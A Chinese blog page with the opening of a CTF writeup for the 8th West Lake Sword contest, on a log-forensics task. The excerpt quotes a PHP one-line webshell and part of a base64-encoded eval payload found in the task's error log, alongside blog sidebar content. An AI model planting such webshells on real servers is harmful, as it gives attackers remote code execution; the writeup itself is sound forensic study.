西湖论剑

第八届西湖论剑·网络安全大会初赛Writeup
第八届西湖论剑·网络安全大会初赛Writeup
Created|CTF|CTF西湖论剑
我猜你是那种下载文件夹里一堆“西湖论剑附件”,16:00的时候看着自己的排名发现自己论剑论了个寂寞的玩家 [DS] easydatalog | @Luminoria | 未出 请你对附件中的日志文件进行分析,找出“张三”的身份证号和手机号,譬如其身份证号是119795199308186673,手机号是73628276413,则提交的flag为“119795199308186673_73628276413”。 打开附件,发现error.log体积比较大,里面有很多的内容 204行发现一句话木马 <?php eval($_POST[1]);?> 252行及后面发现多行b64编码内容,且每个的内容不一样 1@eval(@base64_decode($_POST['lc134a7d99e04f']));&lc134a7d99e04f=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXI ...
avatar
GamerNoTitle
TECH OTAKUS SAVE THE WORLD
Articles
117
Tags
151
Categories
9
Follow Me
Announcement
本站的所有图片文件已迁移至Cloudflare R2,除了必要的js和css,其他文件不再使用Github托管jsdelivr访问的业务逻辑
如果你也想使用Cloudflare R2,可以点击下面的链接查看如何使用
Cloudflare R2部署指北
.------.--------.---------.
| .=====================. |\
| | 7  3  5  5  6  0  8 | | |
| +=====================+ | |
|----------------------\\-. |
|    *   |      ^|^    || |\|
|   .-----------------.|| | |
|   |  1  |  2  |  3  ||| | |
|   |-----+-----+-----||| | |
|   |  4  |  5  |  6  ||| | |
|   |-----+-----+-----||| | |
|   |  7  |  8  |  9  ||| | |
|   |-----+-----+-----|// | |
|   |  *  |  0  |  #  |/  | |
|   +-----------------+   | |
|       |       |         | |
+-------+-------+---------+ |
\______\_______\_________+\/
gamernotitle@site_web > ./plant.sh
Boom has been planted.
Recent Post
第八届西湖论剑·网络安全大会初赛Writeup
第八届西湖论剑·网络安全大会初赛Writeup
2025软件系统安全赛华南赛区(CCSSSC2025)Writeup - TEAM Volcania
2025软件系统安全赛华南赛区(CCSSSC2025)Writeup - TEAM Volcania
2024 CISCN x 长城杯铁人三项 初赛Writeup
2024 CISCN x 长城杯铁人三项 初赛Writeup
2024年 GDUTCTF 个人WriteUp
2024年 GDUTCTF 个人WriteUp
ADCTF2024 个人Writeup
ADCTF2024 个人Writeup
Categories
Tags
TechSEOOptimizeWebmasterCTFADCTFPythonFlaskAPIHostWSLWindowsServerSoftwareBaiduBaiduNetdiskAria2BaseCTFBeat SaberGamesModVRPico Neo 3PicoVRCSGOAntiLowViolencePerfectWorldGameServerCryptoMorseWebSSRFHashCCSSSCCCSSSC2025CISCNHackergameHackergame2024网鼎杯Writeup
Archives
Info
Article :
117
Run time :
UV :
PV :
Last Push :